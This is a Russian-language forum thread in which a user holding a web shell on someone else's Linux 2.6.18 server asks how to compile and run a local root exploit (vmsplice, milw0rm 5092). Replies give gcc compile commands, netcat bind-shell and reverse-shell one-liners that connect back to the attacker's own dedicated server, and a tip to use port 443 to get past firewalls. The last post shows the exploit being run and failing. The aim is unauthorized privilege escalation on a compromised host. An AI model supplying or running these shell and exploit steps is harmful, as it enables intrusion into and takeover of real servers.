Есть у меня веб-шелл на серваке Linux Kernel 2.6.18 и сплоит под него - http://www.milw0rm.com/exploits/5092. Со сплоитами никогда не работал, поэтому задаю такой вопрос - как его откомпилить, имея только веб-шелл (права на запись есс-но есть, но только в текущей директории)?
Попробуй Code: gcc -o sploit sploit.c; chmod +x sploit;./sploit НУ или Code: gcc -o sploit sploit.c; chmod 777 sploit;./sploit ну или без chmod Code: gcc -o sploit sploit.c;./sploit А вообще в интернете много статей.
Я видел на хакере точно такой же, только там $ был спереди, поэтому ничего не работало. Сейчас попробую.
У меня Веб-Шелл, а не SSH доступ, и gcc почему-то там не пашет. Я юзаю в eval() PHP: system('gcc -o exploit exploit.c;'); PS: в линухе я полный 0
это чувствуется) $ перед командой - это пояснение, что команды выполняются с правами обычного пользователя. # - с правами рута. забинди порт или сделай бек-конект. что выведет which gcc?
which gcc cc cpp бинди порт, например неткатом nc -l -p 31337 -e /bin/sh & потом у себя неткатом nc -v www.site.com 31337 Если тебе очень повезло и фаер не блочит соединения тебя поприветствует оболчка шелла В ином случае делай бекконект у себя на дедике открываешь порт nc -l -p 31337 на сервер который собираешься рутать nc -v www.dedik.com 31337 -e /bin/sh & Удачи =)
Нет факт что: -- на хосте присутсвует gcc(мало вероятно); -- что у твоего блайнда хватит прав на доступ к gcc(более вероятно, как правило nobody и etc); Скомпиль на локальной машине, скопирую(выстави права по необходимости) и запускай(не фактов тоже много).
Эх вы, "линуксоиды", мне до вас еще далеко... Надо читать, читать и еще раз читать, а лутше - самому линуху установить... Смотрите ПМ
бекконект на порт 443, который предварительно освобождается на дедике(остановка службы https\SSL), проходит в 90% случаев..а дальше тебе уже понаписали. зы: если ядро до 2008г, то шансы на рут есть,в противном случае - уменьшаются в геометрической прогрессии...
Мне уже юзер oRb объяснил, что сплоит не подходит под этот двиг, хотя в uname -a именно эта версия. Спасибо всем за ответы.
ещё как подходит! https://forum.antichat.ru/showthread.php?t=30711 http://forum.xakep.ru/m_1073063/tm.htm
ядро 2.6.18 должно сдаться vmsplice-exploit. А компилится оно так $ gcc -static -Wno-format -o vmsplice vmsplice.c
mailbrush дал мне свой шелл. gcc там нет, поэтому сплойт собрал на другой тачке. Скачал, сменил чмод и запустил: Code: sh-3.2$ ./sp ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [-] mmap: Permission denied sh-3.2$ uname -a Linux ************** 2.6.18-92.1.22.el5PAE #1 SMP Tue Dec 16 12:36:25 EST 2008 i686 i686 i386 GNU/Linux видимо ядро патченное.